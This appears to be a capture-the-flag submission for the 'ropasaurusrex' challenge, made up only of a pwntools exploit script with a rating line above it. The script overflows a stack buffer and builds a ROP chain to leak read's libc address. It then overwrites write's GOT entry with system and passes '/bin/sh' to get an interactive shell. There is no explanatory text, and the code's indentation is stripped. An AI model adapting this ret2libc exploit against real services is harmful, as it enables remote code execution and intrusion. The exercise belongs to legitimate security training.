Rating: 0

```python
from pwn import *
import sys

if sys.argv[1] == 'r':
HOST = "localhost"
PORT = 5000
# LIBC = "./libc.so.6"
LIBC = "/lib/i386-linux-gnu/libc.so.6"
r = remote(HOST, PORT)
elif sys.argv[1] == 'l':
LIBC = "/lib/i386-linux-gnu/libc.so.6"
r = process('ropasaurusrex')

addr_write_got = 0x08049614
addr_read_got = 0x0804961c

addr_write_plt = 0x804830c
addr_read_plt = 0x804832c

pop3ret = 0x80484b6

bss_0x800 = 0x8049628 + 0x800

libc = ELF(LIBC)
offset_read2sytem = libc.symbols[b"system"] - libc.symbols[b"read"]

payload = b"A" * 140
# write(stdout, read(), 4)
payload += p32(addr_write_plt)
payload += p32(pop3ret)
payload += p32(1)
payload += p32(addr_read_got)
payload += p32(4)

# read(stdin, write_got, 4)
payload += p32(addr_read_plt)
payload += p32(pop3ret)
payload += p32(0)
payload += p32(addr_write_got)
payload += p32(4)

# read(stdin, bss_0x800, 8)
payload += p32(addr_read_plt)
payload += p32(pop3ret)
payload += p32(0)
payload += p32(bss_0x800)
payload += p32(8)

# system(binsh_addr)
payload += p32(addr_write_plt)
payload += p32(0xdeadbeef)
payload += p32(bss_0x800)

# debug
with open("payload", "bw") as f:
f.write(payload)

# start
r.send(payload)
addr_read_fun = u32(r.recv())
addr_system_fun = addr_read_fun + offset_read2sytem
r.send(p32(addr_system_fun))
r.send(b"/bin/sh\x00")
r.interactive()
r.close()
```